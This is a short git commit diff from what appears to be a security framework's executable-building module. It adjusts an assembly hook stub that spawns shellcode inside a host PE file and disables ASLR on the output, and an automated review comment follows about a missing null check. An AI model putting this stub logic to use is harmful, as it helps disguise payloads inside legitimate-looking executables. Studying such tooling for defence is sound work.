Mitigate metasm relocation error by disabling ASLR

Deal with import error by actually using the GetProcAddress code.
bug/bundler_fix
scriptjunkie 2013-12-07 20:54:13 -06:00
parent 8d33138489
commit 77e9996501
No known key found for this signature in database
GPG Key ID: E89DE255C921A2C6
1 changed files with 3 additions and 1 deletions


@ -37,7 +37,6 @@ module Exe
push hook_funcname push hook_funcname
push eax push eax
call [iat_GetProcAddress] call [iat_GetProcAddress]
mov eax, [iat_CreateThread]
lea edx, [thread_hook] lea edx, [thread_hook]
push 0 push 0
push 0 push 0
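Review bot: With the `mov eax, [iat_CreateThread]` line removed, eax now carries the return value of `call [iat_GetProcAddress]` straight into the CreateThread argument setup, and nothing in the hunk checks that value; GetProcAddress returns 0 when the export lookup fails, so the later call through eax (presumably after this hunk) would transfer control to address zero and crash the host process. A two-line guard right after the call, `test eax, eax` followed by `jz <existing bail label>`, would route a failed lookup to the stub's bail-out path instead. The enclosing hook stub starts and ends outside the hunk, so the bail label and the eventual `call eax` are not visible here and that wiring should be confirmed against the full stub.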
@ -85,6 +84,9 @@ module Exe
pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
pe.header.time = pe_orig.header.time pe.header.time = pe_orig.header.time
# Don't rebase if we can help it since Metasm doesn't do relocations well
pe.optheader.dll_characts.delete("DYNAMIC_BASE")
prefix = '' prefix = ''
if pe.header.characteristics.include? "DLL" if pe.header.characteristics.include? "DLL"
# if there is no entry point, just return after we bail or spawn shellcode # if there is no entry point, just return after we bail or spawn shellcode